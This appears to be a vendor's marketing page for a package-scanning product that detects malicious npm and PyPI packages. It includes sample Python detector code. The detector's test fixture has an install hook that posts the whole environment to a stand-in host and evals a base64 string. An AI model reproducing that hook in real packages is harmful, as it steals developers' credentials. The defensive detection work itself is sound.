Malicious packages do not wait for advisories.

Modern software is built on code written by strangers. Dependency Guardian finds dangerous package behavior before it reaches your systems.

The tools developers trust are missing real attacks

Every application depends on hundreds of open source packages: building blocks of code shared freely online. When an attacker slips malicious code into one of these packages, it spreads to the thousands of companies and developers who install it.

The gap

Advisory scanners ask:
Has this been reported?
Dependency Guardian asks:
What is this package actually doing?

What happened

2025  Shai Hulud: 500+ packages compromised, credential theft, impact across 25,000+ projects.
2025  Chalk + Debug hijack: compromised high-usage packages with 2.6B combined weekly downloads.
2025  S1ngularity campaign: 2,349 developer credentials stolen from 1,079 systems.

In late 2025, an attack called Shai Hulud infected over 500 widely used software packages, including tools from CrowdStrike with millions of weekly users. It stole developer credentials and leaked them across 25,000+ projects. A follow-up wave hit packages from Zapier, PostHog, and Postman.

The Chalk and Debug hijack affected packages with 2.6 billion combined weekly downloads. The S1ngularity campaign stole 2,349 developer credentials from 1,079 systems. New malicious packages land on npm and PyPI every day; many sit for hours or days before they're flagged in any advisory database.

What we learned

The registry is not enough. The code has to be inspected before it reaches your build.

The standard tools missed it because there was no advisory yet.

Dependency Guardian behavior analysis flow

We inspect package behavior, not just advisory databases

Static + behavioral: catch rate by attack class. Detailed per-class TPR and FPR numbers are on the benchmark page, measured against an in-repo validation corpus.
<1% false positive rate: tested against 3,967 clean packages from npm and PyPI (0.38% combined FPR: 0.44% npm, 0.29% PyPI).
Full behavioral engine: file scanning and metadata detectors, plus cross-detector rules.

Dependency Guardian reads the actual source code of every package. It looks for credential theft, data sent to unknown servers, code hidden behind obfuscation, and packages that install themselves where they shouldn't be.

Detectors run on every scan. Cross-detector rules combine signals so that attacks using several techniques together, such as an install hook that harvests the environment and posts it to an outside host, are caught even when no single signal is conclusive on its own. Suspicious packages can be routed to an isolated sandbox to observe what they actually do.
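To make the detector-plus-cross-rule idea concrete, here is an added example of the pattern in Python. It is illustration code written for this page, not Dependency Guardian's engine; the detector regexes, signal names, rule names and the sample package contents are all constructed assumptions. It scans a small in-memory npm package: a metadata detector flags install-time lifecycle scripts, file detectors flag environment harvesting, outbound network calls, dynamic eval and base64 decoding, and cross-detector rules only raise a finding when the required combination of signals is present. A clean package that merely reads a single environment variable produces no finding.

```python
"""Toy static behavioral scan of an npm package (example code, not Dependency Guardian's)."""
import json
import re
from typing import Dict, List, Set

# Constructed sample package: postinstall hook, whole-environment harvest,
# POST to an unfamiliar host, and eval of a base64-decoded string.
SAMPLE_PACKAGE: Dict[str, str] = {
    "package.json": json.dumps({
        "name": "left-pad-utils",          # hypothetical package name
        "version": "1.0.3",
        "scripts": {"postinstall": "node setup.js"},
    }),
    "setup.js": (
        "const os = require('os');\n"
        "const https = require('https');\n"
        "const payload = JSON.stringify({env: process.env, host: os.hostname()});\n"
        "const req = https.request({hostname: 'collect.example-cdn.net', method: 'POST', path: '/u'});\n"
        "req.end(payload);\n"
        "eval(Buffer.from('Y29uc29sZS5sb2coJ2hpJyk=', 'base64').toString());\n"
    ),
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
}

# Constructed clean package: reads one env var, has no install hook.
CLEAN_PACKAGE: Dict[str, str] = {
    "package.json": json.dumps({"name": "tiny-logger", "scripts": {"test": "jest"}}),
    "index.js": "const debug = process.env.DEBUG === '1';\nmodule.exports = (m) => debug && console.log(m);\n",
}

# File detectors (hypothetical patterns): detector name -> regex applied per source line.
FILE_DETECTORS = {
    # process.env passed around as a whole object, not process.env.SOME_VAR
    "env_harvest": re.compile(r"process\.env(?![\w.\[])"),
    "network_send": re.compile(
        r"\b(?:https?|net|dgram)\.(?:request|connect|createConnection|createSocket)\b|\bfetch\s*\("),
    "dynamic_eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "base64_decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\s*\)|\batob\s*\("),
}

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Cross-detector rules (hypothetical): a finding fires only when every listed signal is present.
CROSS_RULES: Dict[str, Set[str]] = {
    "install_time_exfiltration": {"install_hook", "env_harvest", "network_send"},
    "obfuscated_code_execution": {"dynamic_eval", "base64_decode"},
}


def scan_metadata(manifest: str) -> Set[str]:
    """Metadata detector: flag lifecycle scripts that execute code at install time."""
    scripts = json.loads(manifest).get("scripts", {})
    return {"install_hook"} if any(hook in scripts for hook in INSTALL_HOOKS) else set()


def scan_file(path: str, source: str) -> Dict[str, List[str]]:
    """File detector: return detector name -> evidence locations ('path:lineno')."""
    hits: Dict[str, List[str]] = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in FILE_DETECTORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(f"{path}:{lineno}")
    return hits


def scan_package(files: Dict[str, str]) -> dict:
    """Run all detectors over a package, then apply cross-detector rules to the signal set."""
    evidence: Dict[str, List[str]] = {}
    manifest = files.get("package.json")
    if manifest:
        for signal in scan_metadata(manifest):
            evidence.setdefault(signal, []).append("package.json:scripts")
    for path, source in files.items():
        if path.endswith((".js", ".cjs", ".mjs")):
            for signal, locations in scan_file(path, source).items():
                evidence.setdefault(signal, []).extend(locations)
    signals = set(evidence)
    findings = sorted(rule for rule, needed in CROSS_RULES.items() if needed <= signals)
    return {"signals": sorted(signals), "findings": findings, "evidence": evidence}


if __name__ == "__main__":
    for name, pkg in (("sample", SAMPLE_PACKAGE), ("clean", CLEAN_PACKAGE)):
        print(name, json.dumps(scan_package(pkg), indent=2))
```

Each finding carries the file and line that produced every contributing signal, which is what a reviewer needs in order to confirm or dismiss it quickly. The regexes are deliberately narrow (a lone `process.env.DEBUG` read does not count as harvesting) because false positives on clean packages are the cost that decides whether a tool like this stays enabled in a build pipeline.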